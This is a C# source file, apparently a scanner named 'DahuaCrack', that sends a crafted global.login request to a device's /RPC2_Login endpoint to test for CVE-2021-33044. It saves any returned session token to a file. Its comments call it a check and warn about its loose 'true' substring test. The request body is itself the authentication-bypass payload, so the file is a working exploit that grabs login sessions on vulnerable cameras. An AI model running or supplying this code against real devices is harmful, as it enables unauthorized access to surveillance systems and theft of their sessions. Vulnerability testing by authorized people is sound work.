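using System;
using System.Net.Http;
using System.Net.Http.Headers;
using System.Text;
using System.Threading.Tasks;
using Newtonsoft.Json;

namespace Sandbox
{
    /// <summary>
    /// Checks whether a device's <c>/RPC2_Login</c> endpoint accepts the login request
    /// associated with CVE-2021-33044 and reports the outcome on the console.
    /// </summary>
    public static class DahuaCrack
    {
        /// <summary>
        /// Posts one <c>global.login</c> request to <c>{protocol}://{ip}:{port}/RPC2_Login</c>
        /// and classifies the device from the response body.
        /// </summary>
        /// <param name="ip">Host name or address of the device under test.</param>
        /// <param name="port">TCP port of the device's web interface.</param>
        /// <param name="protocol">URL scheme placed in front of the target, e.g. <c>http</c>.</param>
        /// <returns>A task that completes once the check has been reported.</returns>
        /// <remarks>
        /// The method never throws: every exception is caught and only its message is printed,
        /// so a timeout or connection failure is an inconclusive result, not a "not vulnerable" one.
        /// On a positive result the URL and the raw response body are written to
        /// <c>vulnerable.txt</c> in the current working directory, replacing any earlier content.
        /// </remarks>
        public static async Task Crack(string ip, string port, string protocol)
        {
            try
            {
                var target = $"{ip}:{port}";
                var url = $"{protocol}://{target}/RPC2_Login";
                Console.WriteLine(url);

                // Login request body; the password field is a fixed placeholder string.
                var postJson = new
                {
                    id = 1,
                    method = "global.login",
                    @params = new
                    {
                        authorityType = "Default",
                        clientType = "NetKeyboard",
                        loginType = "Direct",
                        password = "Not Used",
                        passwordType = "Default",
                        userName = "admin"
                    },
                    session = 0
                };

                // Dispose the client, the request body and the response so that sockets and
                // buffers are released even when the request fails or times out.
                using (var httpClient = new HttpClient())
                using (var content = new StringContent(JsonConvert.SerializeObject(postJson), Encoding.UTF8, "application/json"))
                {
                    httpClient.Timeout = TimeSpan.FromSeconds(5);
                    httpClient.DefaultRequestHeaders.Accept.Add(new MediaTypeWithQualityHeaderValue("application/json"));

                    using (var response = await httpClient.PostAsync(url, content))
                    {
                        var responseContent = await response.Content.ReadAsStringAsync();
                        Console.WriteLine(responseContent);

                        // NOTE(review): this is a substring heuristic. Any body containing "true"
                        // (an error page, an unrelated JSON field) is reported as vulnerable, and the
                        // HTTP status code is not consulted. Confirm a positive result before acting on it.
                        if (responseContent.Contains("true"))
                        {
                            Console.WriteLine("vulnerable with CVE-2021-33044");

                            // The saved body is the device's raw login response; per the message below
                            // it carries a session token, so handle the file as credential material:
                            // restrict access to it and delete it once the finding has been recorded.
                            await System.IO.File.WriteAllTextAsync("vulnerable.txt", $"{url}\n{responseContent}");
                            Console.WriteLine("session token saved to vulnerable.txt");
                        }
                        else
                        {
                            // Reports the same CVE identifier as the positive branch.
                            Console.WriteLine("Not Vulnerable with CVE-2021-33044!");
                        }
                    }
                }
            }
            catch (Exception ex)
            {
                // Best-effort check: report the failure and return without rethrowing.
                Console.WriteLine(ex.Message);
            }
        }
    }
}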